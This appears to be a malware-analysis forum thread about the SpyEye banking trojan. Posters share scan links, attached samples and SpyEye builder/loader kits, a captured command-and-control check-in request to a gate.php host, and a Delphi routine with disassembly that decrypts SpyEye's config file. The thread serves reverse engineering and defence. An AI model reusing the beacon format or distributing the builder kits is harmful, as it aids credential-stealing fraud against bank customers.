http://camas.comodo.com/cgi-bin/submit? ... 4d92195095
http://www.virustotal.com/file-scan/rep ... 1298660191
http://www.virustotal.com/file-scan/rep ... 1298660191
Attachments
(291.08 KiB) Downloaded 64 times
A forum for reverse engineering, OS internals and malware analysis
Attachments
(211.9 KiB) Downloaded 64 times
markusg wrote:http://virusscan.jotti.org/de/scanresul ... 6bab0f122aSpyEye v1.3
mafsupport.com GET /~brbrabr/gate.php?guid=5.1.2600!FUCKTHAT!D06F0742&ver=10310&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&ccrc=6BBA1CA6&md5=c1d4ff03593201296531783c9b13936f&plg=customconnector&stat=online HTTP/1.1
Ring0 - the source of inspiration
a prevx blog entry that explains the spyeye config.bin decryption algorithm:
http://www.prevx.com/blog/168/SpyEye-th ... eader.html
a movie how to unpack spyeye with ollydbg:
http://www.youtube.com/watch?v=ns7fQhSNiRY
http://www.prevx.com/blog/168/SpyEye-th ... eader.html
a movie how to unpack spyeye with ollydbg:
http://www.youtube.com/watch?v=ns7fQhSNiRY
SpyEye.Builder v1.2.80 + loader https://www.virustotal.com/file-scan/re ... 1300196979
SpyEye.Builder v1.2.99 + loader https://www.virustotal.com/file-scan/re ... 1299958054
SpyEye.Builder v1.2.99 + loader https://www.virustotal.com/file-scan/re ... 1299958054
Attachments
See archive comment for password
(3.4 MiB) Downloaded 84 times
(3.4 MiB) Downloaded 84 times
Attachments
(317.17 KiB) Downloaded 56 times
Personally I found this funny.
Omfg! Process is still active? Lets kill that mazafaka!:)
Ring0 - the source of inspiration
:lol:, some more malware humour.
Find attached decrypted config.bin (small decryptor coming soon)
pass: EA9D67D04EA91926C211C45DE8AF991E (from SpyEye itself)
edit:
pass: EA9D67D04EA91926C211C45DE8AF991E (from SpyEye itself)
edit:
Code: Select all
loltype
BYTEBUF = array[0..0] of BYTE;
PBYTEBUF = ^BYTEBUF;
{
0091030E SpyEye_DecryptCycle:
0091030E mov dl, [eax+ecx]
00910311 xor dl, 4Ch
00910314 sub dl, [eax+ecx-1]
00910318 mov [eax+ecx], dl
0091031B dec eax
0091031C test eax, eax
0091031E jg short SpyEye_DecryptCycle
}
procedure SpyEyeDecodeConfig(lpConfigName: PWideChar);
var
hInput, hOutput: THANDLE;
fsize, bytesIO: DWORD;
i: integer;
c: byte;
buf: PBYTEBUF;
begin
hInput := CreateFileW(lpConfigName, GENERIC_READ, 0, nil, OPEN_EXISTING, 0, 0);
if (hInput <> INVALID_HANDLE_VALUE) then
begin
fsize := GetFileSize(hInput, nil);
buf := pointer(LocalAlloc(LPTR, fsize + 1));
if (buf <> nil) then
begin
_ReadFile(hInput, buf, fsize, @bytesIO, nil);
for i := fsize downto 1 do
begin
c := buf[i] xor $4C;
c := c - buf[i - 1];
buf[i] := c;
end;
hOutput := CreateFileW('decrypted.zip', GENERIC_WRITE, 0, nil, CREATE_ALWAYS, 0, 0);
if (hOutput <> INVALID_HANDLE_VALUE) then
begin
_WriteFile(hOutput, buf, fsize, @bytesIO, nil);
CloseHandle(hOutput);
end;
LocalFree(HLOCAL(buf));
end;
end;
CloseHandle(hInput);
end;
C:\Data\Documents\My Projects\CC\CardNet\Progs\Client\SpyEye\plugins\BC\Client\Release\socks5.pdb
Attachments
(154.34 KiB) Downloaded 66 times
Ring0 - the source of inspiration
Is 0x4C the byte used in the XOR operation currently? It was 0xC4 not so long time ago